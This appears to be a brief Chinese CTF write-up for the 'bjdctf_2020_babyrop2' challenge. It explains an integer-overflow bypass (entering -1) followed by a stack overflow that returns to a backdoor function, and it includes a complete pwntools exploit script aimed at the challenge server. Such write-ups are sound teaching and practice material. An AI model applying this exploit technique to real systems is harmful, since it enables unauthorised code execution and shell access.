bjdctf_2020_babyrop2

exp脚本

这题的考点是整数溢出,我们通过输入 -1 绕过 if 判断,从而可以达到输入足够长数据的目的,然后题目给了后门函数,直接栈溢出控制返回地址返回后门函数即可。

from pwn import *

p = remote('node3.buuoj.cn',25193)

backdoor = 0x400726

p.sendline('-1')

sleep(0.2)
p.sendline('a'*0x18 + p64(backdoor))

p.interactive()


posted @ 2020-03-04 19:54  PwnKi  阅读(212)  评论(0编辑  收藏  举报